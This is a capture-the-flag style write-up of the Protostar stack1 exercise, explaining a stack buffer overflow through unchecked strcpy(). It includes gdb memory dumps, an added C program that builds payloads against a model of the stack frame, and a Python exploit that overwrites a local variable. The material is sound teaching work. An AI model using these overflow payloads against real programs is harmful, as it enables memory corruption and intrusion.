Introduction
In the previous exercise (stack0) we changed the value of the variable modified on the stack by exploiting a stack buffer overflow, but we did not control what value modified ended up holding. In this exercise the goal is to set modified to one specific value, which requires understanding how the variables are laid out in memory and in which byte order an int is stored.
Source code
```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>        /* errx(); the original listing relies on an implicit declaration */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* no length check: an argument longer than 64 bytes runs past buffer
   * and overwrites whatever sits above it on the stack, here modified */
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {   /* line 18 in the original listing; gdb breakpoint below */
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
```
Analysis
Note that buffer is no longer filled with gets() as in stack0; the input is taken from the program's first command-line argument (argv[1]) and copied with strcpy(). This does not change the payload itself, but it does change how the exploit delivers it: instead of writing to the program's stdin we pass the payload as an argument. That is dealt with in the exploit section below.
The code shows that the goal of this exercise is to make modified equal 0x61626364. The stack layout should be the same as in stack0, but we run the program under gdb once more, this time to look at how the variables are laid out in memory. We use "abcd" as the input and break on line 18 of the source, the comparison if(modified == 0x61626364), so the strcpy() has already run when we inspect the stack:
```
$ gdb stack1
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack1...done.
(gdb) b 18
Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
(gdb) r abcd
Starting program: /opt/protostar/bin/stack1 abcd

Breakpoint 1, main (argc=2, argv=0xbffffd64) at stack1/stack1.c:18
18      stack1/stack1.c: No such file or directory.
        in stack1/stack1.c
(gdb) print $esp
$1 = (void *) 0xbffffc50
(gdb) print $ebp
$2 = (void *) 0xbffffcb8
(gdb) x/26xw $esp
0xbffffc50:     0xbffffc6c      0xbffffe94      0xb7fff8f8      0xb7f0186e
0xbffffc60:     0xb7fd7ff4      0xb7ec6165      0xbffffc78      0x64636261
0xbffffc70:     0xb7fd7f00      0x080496fc      0xbffffc88      0x08048334
0xbffffc80:     0xb7ff1040      0x080496fc      0xbffffcb8      0x08048509
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0x080484f0      0xbffffcb8
0xbffffca0:     0xb7ec6365      0xb7ff1040      0x080484fb      0x00000000
0xbffffcb0:     0x080484f0      0x00000000
(gdb) info address modified
Symbol "modified" is a local variable at frame offset 92.
```
Reading the dump: esp is 0xbffffc50 and the word at 0xbffffc6c (esp+0x1c) is 0x64636261, which is our input "abcd". x86 is little-endian, so the bytes 'a' (0x61), 'b' (0x62), 'c' (0x63), 'd' (0x64) stored at increasing addresses are read back as the integer 0x64636261: the lowest address holds the least significant byte. gdb reports modified at frame offset 92, i.e. at 0xbffffc50 + 92 = 0xbffffcac, which is exactly 64 bytes past the start of buffer and still holds 0x00000000. To make modified read as 0x61626364, the four bytes at 0xbffffcac must be 0x64 0x63 0x62 0x61, i.e. the string "dcba". The payload is therefore 64 bytes of filler followed by "dcba"; "dcba"*17 (68 bytes) does exactly that: the first 64 bytes fill buffer and the last four land on modified. strcpy() also copies the terminating NUL, which lands one byte past modified and does not affect the check.
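The following C program is an added example, not part of the original write-up. It turns the reasoning above into code: it computes the buffer-to-modified distance from the gdb addresses, shows how "abcd" decodes to 0x64636261 on a little-endian machine, builds the strcpy() payload for an arbitrary 32-bit target value, and runs that payload through a small model of the stack1 frame (buffer[64] immediately followed by modified) instead of the real binary. The addresses are the ones printed in the gdb session; the frame model, the function names and the guard that keeps the model from overflowing itself are assumptions of this example. It also handles the case the page's payload never hits: a target containing a zero byte, which strcpy() cannot deliver except as the most significant byte, where the terminator that strcpy() writes anyway supplies it.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Addresses from the gdb session (32-bit x86, stack1 at the line-18 breakpoint):
 * buffer starts at 0xbffffc6c (esp+0x1c) and modified sits at esp+92. */
#define ESP_AT_BREAK   0xbffffc50u
#define BUFFER_ADDR    0xbffffc6cu
#define MODIFIED_ADDR  (ESP_AT_BREAK + 92u)

/* Bytes between the start of buffer and modified: 64, the whole buffer. */
static size_t frame_offset(void)
{
    return (size_t)(MODIFIED_ADDR - BUFFER_ADDR);
}

/* Read four bytes as a little-endian 32-bit value, the way the CPU does when
 * stack1 loads modified: the lowest address is the least significant byte. */
static uint32_t le32_decode(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build a strcpy()-deliverable payload: `offset` bytes of filler followed by
 * `target` in little-endian byte order.  Returns the payload length without
 * the NUL terminator, or 0 if the target cannot be delivered: strcpy() stops
 * at the first NUL, so the only zero byte allowed is the most significant one,
 * which the terminator strcpy() writes anyway provides. */
static size_t build_payload(uint32_t target, size_t offset, char *out, size_t out_len)
{
    unsigned char le[4] = {
        (unsigned char)(target & 0xffu),
        (unsigned char)((target >> 8) & 0xffu),
        (unsigned char)((target >> 16) & 0xffu),
        (unsigned char)((target >> 24) & 0xffu),
    };
    size_t len = (le[3] == 0) ? 3 : 4;   /* top byte zero: supplied by the terminator */
    for (size_t i = 0; i < len; i++)
        if (le[i] == 0)
            return 0;                    /* interior NUL: strcpy() would truncate */
    if (out_len < offset + len + 1)
        return 0;
    /* Filler content is irrelevant to the overflow; repeating the target bytes
     * reproduces the page's "dcba"*17 for offset 64 and target 0x61626364. */
    for (size_t i = 0; i < offset; i++)
        out[i] = (char)le[i % len];
    memcpy(out + offset, le, len);
    out[offset + len] = '\0';
    return offset + len;
}

/* Model of the stack1 frame: buffer[64] immediately followed by modified,
 * with modified = 0 as in the program.  Returns what modified holds after the
 * unchecked strcpy(buffer, argv[1]). */
static uint32_t simulate_stack1(const char *argv1)
{
    unsigned char frame[64 + 4 + 64] = {0};
    /* Guard for this model only; the real program has no such check, which is
     * exactly the bug being exploited. */
    if (strlen(argv1) >= sizeof frame) {
        fprintf(stderr, "input too long for the model frame\n");
        abort();
    }
    strcpy((char *)frame, argv1);
    return le32_decode(frame + frame_offset());
}

int main(void)
{
    char payload[256];
    /* Constructed targets: the page's value, one with a leading zero byte
     * (deliverable), and one with an interior zero byte (not deliverable). */
    uint32_t targets[] = { 0x61626364u, 0x00616263u, 0x61006364u };

    for (size_t t = 0; t < sizeof targets / sizeof targets[0]; t++) {
        size_t n = build_payload(targets[t], frame_offset(), payload, sizeof payload);
        if (n == 0) {
            printf("0x%08x: cannot be delivered through strcpy (interior NUL)\n", targets[t]);
            continue;
        }
        printf("0x%08x: payload of %zu bytes, tail \"%s\", modified becomes 0x%08x\n",
               targets[t], n, payload + frame_offset(), simulate_stack1(payload));
    }
    return 0;
}
```

The distance returned by frame_offset() is what decides the payload length, so when the same method is applied to another binary the two addresses should be taken from that binary's own gdb session rather than reused from here; compiler version, optimisation level and any stack protector can place modified elsewhere or below buffer.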
Writing the exploit
This time the program reads its input from argv[1] rather than from stdin, so there is no need to interact with the process while it runs: the payload can simply be appended to the command line and the program started with os.system(). Note that os.system() hands the command to /bin/sh, which is fine here because "dcba"*17 contains no shell metacharacters or NUL bytes; a payload with arbitrary bytes would be better passed as an argv list through the subprocess module. The code is as follows:
```python
import os

# 64 bytes to fill buffer, then "dcba", which is 0x61626364 in little-endian order
payload = "dcba" * 17
# the payload is delivered as argv[1]; no stdin interaction is needed
cmd = "/opt/protostar/bin/stack1 " + payload
os.system(cmd)
```
Result:

```
$ python exploit1.py
you have correctly got the variable to the right value
```